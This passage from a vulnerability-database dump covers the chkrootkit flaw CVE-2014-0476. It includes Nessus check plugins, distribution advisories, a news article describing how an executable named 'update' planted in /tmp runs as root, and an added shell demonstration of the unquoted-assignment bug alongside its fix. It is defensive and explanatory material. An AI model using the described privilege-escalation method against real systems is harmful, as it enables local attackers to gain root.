root access when\n/tmp is mounted without the noexec option.", "edition": 15, "published": "2014-06-04T00:00:00", "title": "Debian DSA-2945-1 : chkrootkit - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": 
"2014-06-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chkrootkit", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2945.NASL", "href": "https://www.tenable.com/plugins/nessus/74294", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2945. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74294);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_xref(name:\"DSA\", value:\"2945\");\n\n script_name(english:\"Debian DSA-2945-1 : chkrootkit - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when\n/tmp is mounted without the noexec option.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/chkrootkit\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2945\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chkrootkit packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 0.49-4.1+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"chkrootkit\", reference:\"0.49-4.1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:51", "description": "A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. 
A local attacker could\nuse this flaw to escalate their privileges.", "edition": 23, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : chkrootkit (ALAS-2014-370)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:chkrootkit", "p-cpe:/a:amazon:linux:chkrootkit-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-370.NASL", "href": "https://www.tenable.com/plugins/nessus/78313", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-370.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78313);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_xref(name:\"ALAS\", value:\"2014-370\");\n\n script_name(english:\"Amazon Linux AMI : chkrootkit (ALAS-2014-370)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. 
A local attacker could\nuse this flaw to escalate their privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-370.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update chkrootkit' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:chkrootkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: 
\"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"chkrootkit-0.49-9.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"chkrootkit-debuginfo-0.49-9.8.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit / chkrootkit-debuginfo\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:06:20", "description": "The remote host is affected by the vulnerability described in GLSA-201709-05\n(chkrootkit: Local privilege escalation)\n\n When /tmp is mounted without the noexec option chkrootkit will execute\n files in /tmp with root privileges.\n \nImpact :\n\n A local attacker could possibly execute arbitrary code with root\n privileges.\n \nWorkaround :\n\n Users should mount /tmp with noexec option.", "edition": 24, "published": "2017-09-18T00:00:00", "title": "GLSA-201709-05 : chkrootkit: Local privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chkrootkit"], "id": "GENTOO_GLSA-201709-05.NASL", "href": "https://www.tenable.com/plugins/nessus/103273", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-05.\n#\n# The advisory text is 
Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103273);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_xref(name:\"GLSA\", value:\"201709-05\");\n\n script_name(english:\"GLSA-201709-05 : chkrootkit: Local privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-05\n(chkrootkit: Local privilege escalation)\n\n When /tmp is mounted without the noexec option chkrootkit will execute\n files in /tmp with root privileges.\n \nImpact :\n\n A local attacker could possibly execute arbitrary code with root\n privileges.\n \nWorkaround :\n\n Users should mount /tmp with noexec option.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All chkrootkit users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-forensics/chkrootkit-0.50'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-forensics/chkrootkit\", unaffected:make_list(\"ge 0.50\"), vulnerable:make_list(\"lt 0.50\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:27:18", "description": "Thomas Stangner discovered that chkrootkit incorrectly quoted certain\nvalues. 
A local attacker could use this issue to execute arbitrary\ncode when chkrootkit is run and gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2014-06-05T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 13.10 / 14.04 LTS : chkrootkit vulnerability (USN-2230-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-05T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:chkrootkit", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2230-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74322", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2230-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74322);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"USN\", value:\"2230-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 13.10 / 14.04 LTS : chkrootkit vulnerability (USN-2230-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Thomas Stangner discovered that chkrootkit incorrectly quoted certain\nvalues. A local attacker could use this issue to execute arbitrary\ncode when chkrootkit is run and gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2230-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|13\\.10|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 13.10 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"chkrootkit\", pkgver:\"0.49-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"chkrootkit\", pkgver:\"0.49-4ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"chkrootkit\", pkgver:\"0.49-4.1ubuntu1.13.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"chkrootkit\", pkgver:\"0.49-4.1ubuntu1.14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "Thomas Stangner discovered that chkrootkit incorrectly quoted certain \nvalues. 
A local attacker could use this issue to execute arbitrary code \nwhen chkrootkit is run and gain root privileges.", "edition": 5, "modified": "2014-06-04T00:00:00", "published": "2014-06-04T00:00:00", "id": "USN-2230-1", "href": "https://ubuntu.com/security/notices/USN-2230-1", "title": "chkrootkit vulnerability", "type": "ubuntu", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "chkrootkit is a tool to locally check for signs of a rootkit. It contains: * chkrootkit: shell script that checks system binaries for rootkit modification. * ifpromisc: checks if the network interface is in promiscuous mode. * chklastlog: checks for lastlog deletions. * chkwtmp: checks for wtmp deletions. * chkproc: checks for signs of LKM trojans. * chkdirs: checks for signs of LKM trojans. * strings: quick and dirty strings replacement. * chkutmp: checks for utmp deletions. ", "modified": "2014-06-13T05:30:39", "published": "2014-06-13T05:30:39", "id": "FEDORA:E2C6D23CD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: chkrootkit-0.49-9.fc19", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "chkrootkit is a tool to locally check for signs of a rootkit. It contains: * chkrootkit: shell script that checks system binaries for rootkit modification. * ifpromisc: checks if the network interface is in promiscuous mode. * chklastlog: checks for lastlog deletions. * chkwtmp: checks for wtmp deletions. * chkproc: checks for signs of LKM trojans. * chkdirs: checks for signs of LKM trojans. * strings: quick and dirty strings replacement. * chkutmp: checks for utmp deletions. 
", "modified": "2014-06-13T05:26:35", "published": "2014-06-13T05:26:35", "id": "FEDORA:84EC8239ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: chkrootkit-0.49-9.fc20", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:49", "bulletinFamily": "info", "cvelist": ["CVE-2014-3145", "CVE-2014-3144", "CVE-2014-3153", "CVE-2014-0476"], "description": "Multiple flaws have been identified in the Linux kernel and related software that could allow attackers to compromise Linux machines, shared hosting and the websites hosted on them.\n\n**PRIVILEGE ESCALATION VULNERABILITY IN LINUX KERNEL**\n\nA privilege escalation vulnerability has been [identified](<https://lists.debian.org/debian-security-announce/2014/msg00130.html>) in the widely used Linux kernel that could allow an attacker to take control of a user\u2019s system.\n\nOn Thursday, Debian, one of the most popular distributors of the open source Linux OS, warned about this vulnerability (CVE-2014-3153) in a security update, along with other Linux kernel vulnerabilities that may lead to denial of service.\n\nThe most critical one is the flaw (CVE-2014-3153) discovered by Pinkie Pie, which resides in the futex subsystem of _[Linux Kernel](<https://thehackernews.com/search/label/Linux%20kernel>) versions 2.6.32.62/3.2.59/3.4.91/3.10.41/3.12.21/3.14.5_, leaving a queued kernel waiter on the stack; this can be exploited to execute arbitrary code with kernel-mode privileges.\n\n> \"_Pinkie Pie discovered an issue in the futex subsystem that allows a local user to gain ring 0 control via the futex syscall,_\" reads the advisory. 
\"_An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation.\"_\n\n[Pinkie Pie](<https://thehackernews.com/search/label/Pinkie%20Pie%20hacker>) is the anonymous teenage hacker who has earned at least $100,000 for bypassing the security features of Google's Chrome, many of them sandbox exploits, at the Pwnium and Pwn2Own competitions every year since 2012.\n\n**RESEARCHER\u2019S ADVICE**\n\n_Kees Cook_, a Google Chrome OS security researcher and Ubuntu contributor, said that the latest flaw found by Pinkie Pie is \"urgent to fix.\"\n\n> \"_Specifically, the futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0,_\" Cook [wrote](<http://seclists.org/oss-sec/2014/q2/469>) Thursday on Seclists.org. \"_This flaw is especially urgent to fix because futex tends to be available within most Linux sandboxes (because it is used as a glibc pthread primitive)._\"\n\n**CHKROOTKIT - ANOTHER CRITICAL FLAW**\n\nThe kernel flaw was highlighted two days after Thomas Stangner [reported](<http://www.openwall.com/lists/oss-security/2014/06/04/9>) a serious flaw in chkrootkit (Check Rootkit), a rootkit detector, that allows a local attacker to gain root access by getting malicious code executed from the _/tmp_ directory.\n\nA common Unix program, chkrootkit helps system administrators check their systems for known rootkits. The vulnerability, assigned **_CVE-2014-0476_**, resides in the slapper() function of the chkrootkit shell script. 
A non-root user can place any malicious executable file named 'update' in the _/tmp_ directory, and it will be executed as root whenever chkrootkit scans that directory for rootkits.\n\n**OTHER VULNERABILITIES IN LINUX KERNEL**\n\nTwo further security issues (_**CVE-2014-3144 and CVE-2014-3145**_) have also been discovered in the Linux kernel that could allow any local user to cause a [Denial of Service (DoS) attack](<https://thehackernews.com/search/label/dos%20attack>) via crafted BPF instructions.\n\nDebian has issued patches for these vulnerabilities and encouraged Linux users to upgrade their packages, noting that the issue has been fixed in the stable distribution in version 3.2.57-3+deb7u2 and will be fixed in the unstable distribution as soon as possible.\n", "modified": "2014-06-07T11:43:57", "published": "2014-06-07T00:29:00", "id": "THN:B13AEDC0DAC18F19211BE2B4BE0C4787", "href": "https://thehackernews.com/2014/06/linux-kernel-vulnerable-to-privilege_7.html", "type": "thn", "title": "Linux Kernel Vulnerable to Privilege Escalation and DoS Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
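The NVD summary above ("does not properly quote file paths") and the THN paragraph on the slapper() function describe the bug only in prose. The shell script below is an added illustration written for this page, not chkrootkit's own code: `vuln_scan`, `fixed_scan`, `payload_ran` and `mount_has_noexec` are hypothetical stand-ins, the list of file names they look for is invented, the scan directory is built with mktemp, and the mounts table used in the usage note is constructed. It shows why an unquoted `VAR=$VAR $i` makes the shell execute the file named in `$i`, the quoted form that fixes it, and a check for the `noexec` mount option that the GLSA text gives as the workaround.

```shell
#!/bin/sh
# Added illustration for CVE-2014-0476 (hypothetical code, not chkrootkit's):
# an unquoted shell assignment that executes a file name, the quoted fix, and
# a check for the noexec workaround.
#
# In POSIX sh the line      file_port=$file_port $i
# is parsed, when file_port is empty, as the assignment prefix "file_port="
# followed by the command "$i": the shell EXECUTES the path in $i instead of
# appending it to the list. chkrootkit runs as root, so whatever an attacker
# planted under that name runs as root.

# Hypothetical vulnerable scanner: looks for a few invented file names under
# $1 and is meant to collect the ones that exist in $file_port.
vuln_scan() {
    scandir=$1
    file_port=
    for i in "$scandir/.bugtraq" "$scandir/update" "$scandir/httpd"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i    # BUG: runs "$i" with file_port= in its environment
        fi
    done
    printf '%s\n' "$file_port"         # stays empty: the assignment never took effect
}

# Hardened variant: the right-hand side is quoted, so the shell sees a single
# assignment word and nothing is executed.
fixed_scan() {
    scandir=$1
    file_port=
    for i in "$scandir/.bugtraq" "$scandir/update" "$scandir/httpd"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"  # FIX: the path is appended, never run
        fi
    done
    printf '%s\n' "$file_port"
}

# Runs the named scanner against a constructed directory holding an executable
# called "update" that drops a marker file. The directory is created under the
# current working directory first (less likely than /tmp to be noexec), falling
# back to mktemp's default; the real /tmp is never scanned.
# Returns 0 if the planted payload ran, 1 if it did not.
payload_ran() {
    scan_fn=$1
    d=$(mktemp -d ./scan.XXXXXX 2>/dev/null || mktemp -d) || return 2
    marker="$d/payload-ran"
    printf '#!/bin/sh\ntouch "%s"\n' "$marker" > "$d/update"
    chmod +x "$d/update"
    "$scan_fn" "$d" >/dev/null 2>&1
    if [ -e "$marker" ]; then rc=0; else rc=1; fi
    rm -rf "$d"
    return $rc
}

# The GLSA workaround check: is mount point $1 mounted with noexec? Reads the
# mounts table in $2 (default /proc/self/mounts). Returns 0 if noexec, else 1.
mount_has_noexec() {
    awk -v mp="$1" '
        $2 == mp { n = split($4, o, ","); for (k = 1; k <= n; k++) if (o[k] == "noexec") found = 1 }
        END { if (found) exit 0; exit 1 }' "${2:-/proc/self/mounts}"
}

# Demo when run directly.
if payload_ran vuln_scan; then echo "vuln_scan: planted 'update' was executed"; fi
if payload_ran fixed_scan; then echo "fixed_scan: executed (unexpected)"; else echo "fixed_scan: nothing executed"; fi
if mount_has_noexec /tmp; then echo "/tmp is noexec"; else echo "/tmp is not noexec"; fi
```

Run it as `sh example.sh`. If the directory the payload lands in is mounted noexec, the planted `update` fails with "Permission denied" and `vuln_scan` reports nothing, which is exactly why every advisory above conditions the issue on the /tmp mount options. That mitigation only covers /tmp, though; the fix is the quoted assignment, and a mounts line such as the constructed `tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0` is what `mount_has_noexec /tmp` looks for.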